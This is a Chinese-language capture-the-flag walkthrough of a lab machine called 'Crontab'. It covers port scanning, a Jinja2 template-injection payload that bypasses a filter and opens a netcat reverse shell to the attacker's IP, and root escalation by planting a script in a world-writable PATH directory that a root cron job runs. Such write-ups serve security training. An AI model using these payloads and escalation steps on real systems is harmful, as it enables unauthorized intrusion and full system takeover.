Crontab

靶机说明

• QQ群：660930334

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec/maze-sec/crontab]
└─# nmap -sn 192.168.2.0/24
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-09 10:08 CST
Nmap scan report for 192.168.2.1
Host is up (0.00077s latency).
MAC Address: 0A:00:27:00:00:09 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00056s latency).
MAC Address: 08:00:27:EF:C5:4A (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.7
Host is up (0.0015s latency).
MAC Address: 08:00:27:05:3E:D8 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.07 seconds

靶机IP：192.168.2.7

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec/maze-sec/crontab]
└─# nmap --min-rate 10000 -p- 192.168.2.7 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-09 10:09 CST
Nmap scan report for 192.168.2.7
Host is up (0.00035s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
5000/tcp open  upnp
MAC Address: 08:00:27:05:3E:D8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.40 seconds

开放端口：22、80、5000

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec/maze-sec/crontab]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,5000 192.168.2.7
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-09 10:09 CST
Nmap scan report for 192.168.2.7
Host is up (0.00090s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.62 (Debian)
5000/tcp open  upnp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.1.3 Python/3.9.2
|     Date: Tue, 09 Sep 2025 02:09:38 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 532
|     Connection: close
|     <!DOCTYPE html>
|     <html>
|     <html lang="en">
|     <head>
|     <meta charset="UTF-8">
|     </head>
|     <body>
|     <p1>
|     Marisa
|     DAZE</p1>
|     <br>
|     <br> 
|     <p1>
|     Marisa
|     (bushi</p1>
|     <br>
|     <br>
|     <p1>Marisa
|     </p1>
|     <br>
|     <br>
|     <p1>
|     </p1>
|     <br>
|     <img src="/static/1.png">
|     </body>
|     </html>
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version,
...
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 94.95 seconds

1. 22端口:ssh服务，版本为OpenSSH 8.4p1，用于远程登录
2. 80端口:http服务
3. 5000端口，Server: Werkzeug/3.1.3 Python/3.9.2，猜测可能是python编写的框架

3.UDP端口扫描

┌──(root㉿kali)-[~/miaosec/maze-sec/crontab]
└─# nmap -sU --top-ports 100 192.168.2.7                         
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-09 10:12 CST
Nmap scan report for 192.168.2.7
Host is up (0.0012s latency).
All 100 scanned ports on 192.168.2.7 are in ignored states.
Not shown: 55 closed udp ports (port-unreach), 45 open|filtered udp ports (no-response)
MAC Address: 08:00:27:05:3E:D8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 50.64 seconds

没有开放的udp端口

4.漏洞脚本扫描

┌──(root㉿kali)-[~/miaosec/maze-sec/crontab]
└─# nmap --script=vuln -p22,80,5000 192.168.2.7                     
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-09 10:16 CST
Nmap scan report for 192.168.2.7
Host is up (0.00090s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
5000/tcp open  upnp
MAC Address: 08:00:27:05:3E:D8 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 31.36 seconds

没有新的东西

二、web渗透

1、80端口-http服务

访问80端口，发现是一个静态页面，无利用点；进行目录扫描，也未发现任何有用的信息。

2、5000端口

访问5000端口，得到一个用户marisa，并通过提示猜测可能是存在ssti注入

目录扫描

进行目录扫描

┌──(root㉿kali)-[~/miaosec/maze-sec/crontab]
└─# dirsearch -u "http://192.168.2.7:5000"
...
Target: http://192.168.2.7:5000/
[10:39:33] Starting: 
[10:40:05] 400 -  167B  - /console
[10:40:17] 200 -  179B  - /home
[10:40:22] 200 -  194B  - /library

找到目录：/home、/library

1. 访问/home目录
   
   确认了我们之前的猜测，存在ssti注入，并且参数为touhou，现在需要找到存在注入的页面

2. 访问/library目录
   
   结合上面所给出的信息，猜测该页面存在ssti注入

3. 验证是否存在ssti注入
   
   能够回显，说明存在ssti注入

三、SSTI注入利用

尝试看是否会进行解析

发现有WAF拦截，过滤了{{

直接使用jinfeng进行绕过

提示绕过成功，可以执行shell指令

尝试执行id，成功回显

	方案二
使用{% %}进行替代
{% set x=10-1 %}{% print(x) %}
Payload：
{% set x=().__class__.__bases__[0].__subclasses__() [104].__init__.__globals__['sys'].modules['os'].popen('b usybox nc 192.168.2.4 4444 -e /bin/bash') %}

四、获取shell

直接反弹shell即可

获到shell

┌──(root㉿kali)-[~/miaosec/maze-sec/crontab]
└─# nc -lvnp 4444                        
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.7] 54272
id
uid=1000(marisa) gid=1000(marisa) groups=1000(marisa)

获取稳定shell

script /dev/null -c bash
# 按下 Ctrl+Z 将其挂起
stty raw -echo; fg
# 按下回车
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 24 columns 80

五、权限提升

1、定时任务

根据靶机的名字，首先查看定时任务

marisa@Crontab:~$ cat /etc/crontab 
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
* * * * * root master_spark

发现master_spark是以root权限每分钟执行一次，并且没有绝对路径

当在Linux中执行一个没有绝对路径的命令时，会依次去PATH环境中进行查找

2、PATH写入

查看path目录

marisa@Crontab:~$ ls -la /usr/local/sbin
total 8
drwxrwxrwx  2 root root 4096 Sep  8 03:39 .
drwxr-xr-x 10 root root 4096 Mar 18 20:26 ..

发现具有写入权限

那么直接在目录创建master_spark，写入提权命令即可

marisa@Crontab:~$ cd /usr/local/sbin
marisa@Crontab:/usr/local/sbin$ echo 'chmod +s /bin/bash' >> master_spark
marisa@Crontab:/usr/local/sbin$ chmod +x  master_spark 

3、获取ROOT权限

等待1分钟后查看/bin/bash属性，发现已经具有suid权限

marisa@Crontab:~$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash

直接提权即可

marisa@Crontab:~$ /bin/bash -p
bash-5.0# id;whoami
uid=1000(marisa) gid=1000(marisa) euid=0(root) egid=0(root) groups=0(root),1000(marisa)
root

六、获取FLAG

bash-5.0# cat /home/marisa/user.txt /root/root.txt 
flag{marisa marisa-master spark}
flag{touhou sai gao}